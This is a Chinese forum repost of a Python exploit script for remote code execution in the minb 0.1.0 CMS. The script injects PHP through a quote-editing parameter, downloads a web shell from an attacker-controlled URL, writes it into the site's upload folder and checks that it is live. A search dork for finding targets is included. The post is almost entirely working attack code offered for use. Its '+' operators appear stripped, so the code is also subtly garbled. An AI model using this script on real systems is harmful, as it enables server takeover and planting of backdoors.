• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    minb 0.1.0 Remote Code Execution Exploit

    发布者: 管理员不想理你 | 发布时间: 2025-6-28 22:43| 查看数: 34| 评论数: 0|帖子模式

    #!/usr/bin/python
    #####################################################################################
    ####                     minb Remote Code Execution Exploit                      ####
    #####################################################################################
    #                                                                                   #
    #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
    #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
    #Our Site : Http://IRCRASH.COM                                                      #
    #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
    #####################################################################################
    #                                                                                   #
    #Site : http://minb.sf.net                                                          #
    #                                                                                   #
    #Download : http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2    #
    #                                                                                   #
    #DORK : Powered by minb                                                             #
    #                                                                                   #
    #####################################################################################
    #                                     [Note]                                        #
    #                                                                                   #
    #All php file in this cms have this bug ;)                                          #
    #                                                                                   #
    #####################################################################################
    #                             Site : Http://IRCRASH.COM                             #
    ###################################### TNX GOD ######################################
    import sys,urllib
    if len(sys.argv)<3 :
        print "minb Remote code Execution Exploit"
        print "owered by : R3d.W0rm"
        print "www.IrCrash.com"
        print "Usage : "   sys.argv[0]   " http://Target/path http://evil/shell.txt"
        print "Ex. "   sys.argv[0]   " http://site.com/minb http://r3d.a20.ir/r.txt"
        exit()
    if 'http://' not in sys.argv[1] :
        sys.argv[1]='http://'   sys.argv[1]
    if 'http://' not in sys.argv[2] :
        sys.argv[2]='http://'   sys.argv[2]
    fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'
    data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=";$s=fopen(\''   sys.argv[2]   '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w \');fwrite($fp,$shell);fclose($fp);/*'})
    urllib.urlopen(sys.argv[1]   fp,data)
    urllib.urlopen(sys.argv[1]   fp)
    test=urllib.urlopen(sys.argv[1]   '/upload/pictures/r3d.w0rm.php').read()
    if 'Not Found' not in test :
        print "Shell Uploaded ."
        print sys.argv[1]   '/upload/pictures/r3d.w0rm.php'
    exit()


    来源:https://www.jb51.net/hack/5637.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表